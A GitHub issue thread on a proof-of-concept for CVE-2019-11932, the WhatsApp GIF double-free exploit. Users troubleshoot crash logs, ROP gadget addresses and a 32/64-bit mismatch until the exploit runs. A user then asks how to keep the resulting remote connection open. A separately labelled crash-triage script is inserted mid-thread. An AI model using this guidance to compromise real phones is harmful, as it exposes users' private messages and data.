awakened1712 / CVE-2019-11932

Simple POC for exploiting WhatsApp double-free bug in DDGifSlurp in decoding.c in libpl_droidsonroids_gif
https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/

Whatsapp crashed #6

Closed Ychiel closed 4 years ago

Ychiel commented 4 years ago

Hi, I have Android 9 with WhatsApp 2.19.203. I found the gadget and the system with your Android APK that you published. When I enter the WhatsApp gallery after I sent the GIF file as a document, the app crashed.

Do You have any idea why? Logs:

12-09 14:08:28.563 27111 27111 F DEBUG :
12-09 14:08:28.563 27111 27111 F DEBUG : Build fingerprint: 'samsung/beyond1ltexx/beyond1:9/PPR1.180610.011/G973FXXS3ASJG:user/release-keys'
12-09 14:08:28.564 27111 27111 F DEBUG : Revision: '26'
12-09 14:08:28.564 27111 27111 F DEBUG : ABI: 'arm'
12-09 14:08:28.564 27111 27111 F DEBUG : pid: 26898, tid: 26911, name: ReferenceQueueD >>> com.whatsapp <<<
12-09 14:08:28.564 27111 27111 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
12-09 14:08:28.564 27111 27111 F DEBUG : Abort message: 'Invalid address 0xffcccc66 passed to free: value not allocated'
12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008
12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c
12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00
12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe
12-09 14:08:28.755 27111 27111 F DEBUG :
12-09 14:08:28.755 27111 27111 F DEBUG : backtrace:
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)
12-09 14:08:28.755 27111 27111 F DEBUG : #01 pc 0007e5f9 /system/lib/libc.so (ifree+880)
12-09 14:08:28.756 27111 27111 F DEBUG : #02 pc 0007e717 /system/lib/libc.so (je_free+70)
12-09 14:08:28.756 27111 27111 F DEBUG : #03 pc 0035aa7f /system/lib/libhwui.so (SkDeque::~SkDeque()+30)
12-09 14:08:28.756 27111 27111 F DEBUG : #04 pc 00382f05 /system/lib/libhwui.so (SkBitmapDevice::~SkBitmapDevice()+16)
12-09 14:08:28.756 27111 27111 F DEBUG : #05 pc 0035684f /system/lib/libhwui.so (SkCanvas::internalRestore()+538)
12-09 14:08:28.756 27111 27111 F DEBUG : #06 pc 00358a6d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+28)
12-09 14:08:28.756 27111 27111 F DEBUG : #07 pc 000d732d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #08 pc 00380b1d /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+92)
12-09 14:08:28.756 27111 27111 F DEBUG : #09 pc 000d3363 /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #10 pc 000794a9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.math.NativeBN.BN_copy [DEDUPED]+120)
12-09 14:08:28.756 27111 27111 F DEBUG : #11 pc 0010ddff /system/framework/arm/boot-core-libart.oat (offset 0x77000) (libcore.util.NativeAllocationRegistry$CleanerThunk.run+86)
12-09 14:08:28.756 27111 27111 F DEBUG : #12 pc 0030af63 /system/framework/arm/boot.oat (offset 0x10d000) (sun.misc.Cleaner.clean+90)
12-09 14:08:28.756 27111 27111 F DEBUG : #13 pc 0016ea31 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueueLocked+168)
12-09 14:08:28.756 27111 27111 F DEBUG : #14 pc 0016eb1d /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueuePending+148)
12-09 14:08:28.756 27111 27111 F DEBUG : #15 pc 0014bcb9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$ReferenceQueueDaemon.runInternal+232)
12-09 14:08:28.756 27111 27111 F DEBUG : #16 pc 000ef64b /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$Daemon.run+66)
12-09 14:08:28.756 27111 27111 F DEBUG : #17 pc 00219669 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.Thread.run+64)
12-09 14:08:28.756 27111 27111 F DEBUG : #18 pc 00411375 /system/lib/libart.so (art_quick_invoke_stub_internal+68)
12-09 14:08:28.756 27111 27111 F DEBUG : #19 pc 003ea469 /system/lib/libart.so (art_quick_invoke_stub+224)
12-09 14:08:28.756 27111 27111 F DEBUG : #20 pc 000a1615 /system/lib/libart.so (art::ArtMethod::Invoke(art::Thread*, unsigned int*, unsigned int, art::JValue*, char const*)+136)
12-09 14:08:28.756 27111 27111 F DEBUG : #21 pc 0034b0b5 /system/lib/libart.so (art::(anonymous namespace)::InvokeWithArgArray(art::ScopedObjectAccessAlreadyRunnable const&, art::ArtMethod*, art::(anonymous namespace)::ArgArray*, art::JValue*, char const*)+52)
12-09 14:08:28.756 27111 27111 F DEBUG : #22 pc 0034be0d /system/lib/libart.so (art::InvokeVirtualOrInterfaceWithJValues(art::ScopedObjectAccessAlreadyRunnable const&, _jobject*, _jmethodID*, jvalue*)+320)
12-09 14:08:28.756 27111 27111 F DEBUG : #23 pc 0036d1f3 /system/lib/libart.so (art::Thread::CreateCallback(void*)+866)
12-09 14:08:28.756 27111 27111 F DEBUG : #24 pc 00064939 /system/lib/libc.so (__pthread_start(void*)+140)
12-09 14:08:28.757 27111 27111 F DEBUG : #25 pc 0001e3c5 /system/lib/libc.so (__start_thread+24)

awakened1712 commented 4 years ago

The apk generates gif files that trigger writing test.txt to /sdcard

Probably it succeeded, you can check the sdcard to see if test.txt is there

Ychiel commented 4 years ago

There is no test.txt file. I see just exploit.gif file...

awakened1712 commented 4 years ago

From the log, apparently the exploit was able to hit the gadget found in libhwui.so. Check if WhatsApp has permission to write to the sdcard.

Ychiel commented 4 years ago

Yes, WhatsApp has full permissions (Camera, Contacts, Location, Microphone, Phone, SMS and Storage). What else?

jpclaudino commented 4 years ago

Are you sure you found the system and gadget location? By the log, the Android is 32-bit. The double free occurs normally. But the gadget should not be found. The registers and the addresses are different.

Ychiel commented 4 years ago

I used your APK to find the values for the System and Gadget. Attached the logcat from the APK:

2-17 20:58:41.032 14168 14168 D InputTransport: Input channel destroyed: fd=72
12-17 20:58:43.222 14168 14168 D ViewRootImpl@fe417cb[MainActivity]: ViewPostIme pointer 0
12-17 20:58:43.292 14168 14168 D ViewRootImpl@fe417cb[MainActivity]: ViewPostIme pointer 1
12-17 20:58:43.467 14168 14168 E libgif : gadget = 68 0E 40 F9 60 82 00 91 00 01 3F D6 size = 12 found in
12-17 20:58:43.467 14168 14168 E libgif : 731b3cb000-731bb79000 r-xp 00000000 fd:00 3812 /system/lib64/libhwui.so
12-17 20:58:43.467 14168 14168 E libgif : g1_loc = 0x731b4c3444
12-17 20:58:43.467 14168 14168 E libgif : system_loc = 0x731cab3e08
12-17 20:58:43.467 14168 14168 E libgif : == genLine_0 complete ==
12-17 20:58:43.468 14168 14168 E libgif : buffer = 0x7fe0b318b0 size = 266
12-17 20:58:43.501 14168 14182 I ExternalStorage: Scanned /storage/emulated/0/exploit.gif -> uri = content://media/external/images/media/96

Are those the right results?

jpclaudino commented 4 years ago

Try the following command: adb shell getprop | grep eabi

If you see something like this, you're on a 32-bit architecture.

[ro.product.cpu.abi]: [armeabi-v7a]
[ro.product.cpu.abi2]: [armeabi]
[ro.product.cpu.abilist]: [armeabi-v7a,armeabi]
[ro.product.cpu.abilist32]: [armeabi-v7a,armeabi]
[ro.vendor.product.cpu.abilist]: [armeabi-v7a,armeabi]
[ro.vendor.product.cpu.abilist32]: [armeabi-v7a,armeabi]

Ychiel commented 4 years ago

This is the result: beyond1:/ $ getprop | grep eabi

jpclaudino commented 4 years ago

64-bit architecture. Strange, it may be the version of WhatsApp installed.

These registers and library calls indicate 32-bit libs usage.

12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008
12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c
12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00
12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe
12-09 14:08:28.755 27111 27111 F DEBUG :
12-09 14:08:28.755 27111 27111 F DEBUG : backtrace:
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)

Ychiel commented 4 years ago

I think that the hardware is 64bit but the android OS is 32 bit.

awakened1712 commented 4 years ago

I see, you probably got the 32-bit WhatsApp running on the 64-bit Android device. Then you probably wanna go to apkmirror to find the arm64 version.

I suggest this https://www.apkmirror.com/apk/whatsapp-inc/whatsapp/whatsapp-2-19-216-release/whatsapp-messenger-2-19-216-3-android-apk-download/
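A small crash-triage helper, added here as an example and not part of this repo or of any comment in the thread: it parses debuggerd tombstone lines shaped like the log quoted above together with `getprop` ABI output, reports the crashing process and whether the abort is an invalid free reached through the allocator (je_free/ifree), and flags a 32-bit process on a device that also offers arm64-v8a, which is the mismatch diagnosed in this thread. The sample inputs are constructed from the thread's log; the function and field names are my own.

```python
import re

# Constructed sample: debuggerd tombstone lines in the shape of the crash log quoted in this thread, trimmed for triage.
TOMBSTONE = """\
12-09 14:08:28.564 27111 27111 F DEBUG : ABI: 'arm'
12-09 14:08:28.564 27111 27111 F DEBUG : pid: 26898, tid: 26911, name: ReferenceQueueD >>> com.whatsapp <<<
12-09 14:08:28.564 27111 27111 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
12-09 14:08:28.564 27111 27111 F DEBUG : Abort message: 'Invalid address 0xffcccc66 passed to free: value not allocated'
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)
12-09 14:08:28.755 27111 27111 F DEBUG : #01 pc 0007e5f9 /system/lib/libc.so (ifree+880)
12-09 14:08:28.756 27111 27111 F DEBUG : #02 pc 0007e717 /system/lib/libc.so (je_free+70)
"""

# Constructed sample of `adb shell getprop | grep abilist` on a 64-bit-capable device.
GETPROP = "[ro.product.cpu.abilist]: [arm64-v8a,armeabi-v7a,armeabi]\n"

DEBUG_RE = re.compile(r"F DEBUG\s*:\s*(.*)$")

def parse_tombstone(text):
    """Extract ABI, process, signal, abort message and demangled frame names."""
    info = {"frames": []}
    for line in text.splitlines():
        m = DEBUG_RE.search(line)
        if not m:
            continue
        body = m.group(1)
        if body.startswith("ABI:"):
            info["abi"] = body.split("'")[1]
        elif ">>>" in body:  # 'pid: ..., name: ... >>> <process> <<<'
            info["process"] = body.split(">>>")[1].split("<<<")[0].strip()
        elif body.startswith("signal"):
            info["signal"] = body.split("(")[1].split(")")[0]
        elif body.startswith("Abort message:"):
            info["abort"] = body.split("'", 1)[1].rstrip("'")
        elif body.startswith("#") and "(" in body:  # backtrace frame: '(symbol+offset)'
            info["frames"].append(body.split("(", 1)[1].rsplit("+", 1)[0])
    return info

def device_abis(getprop_text):
    """ABIs the device can run, from the ro.product.cpu.abilist property."""
    m = re.search(r"\[ro\.product\.cpu\.abilist\]: \[([^\]]*)\]", getprop_text)
    return m.group(1).split(",") if m else []

def triage(tombstone_text, getprop_text):
    """Flag an invalid free reached through the allocator, and a 32-bit process on a 64-bit-capable device."""
    info = parse_tombstone(tombstone_text)
    in_allocator = any(f in ("je_free", "ifree") for f in info["frames"])
    invalid_free = "passed to free" in info.get("abort", "") and in_allocator
    abi_mismatch = info.get("abi") == "arm" and "arm64-v8a" in device_abis(getprop_text)
    return {"process": info.get("process"), "invalid_free": invalid_free, "abi_mismatch": abi_mismatch}
```

On the thread's log this reports com.whatsapp aborting on an invalid free under je_free, and on the 32-bit-only getprop output from earlier in the thread the ABI mismatch flag stays off.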

Ychiel commented 4 years ago

Thanks, now it's working... But the connection to the remote server closed immediately. How can I keep the connection open?

awakened1712 commented 4 years ago

Nice. Why do you need to keep it open? I don't mind sharing but I'm afraid script kiddies will misuse it to do hacking in real life.

Ychiel commented 4 years ago

I want to create a demo and show access to WhatsApp data, to explain to our employees that the information in WhatsApp can leak even though communication between devices is encrypted.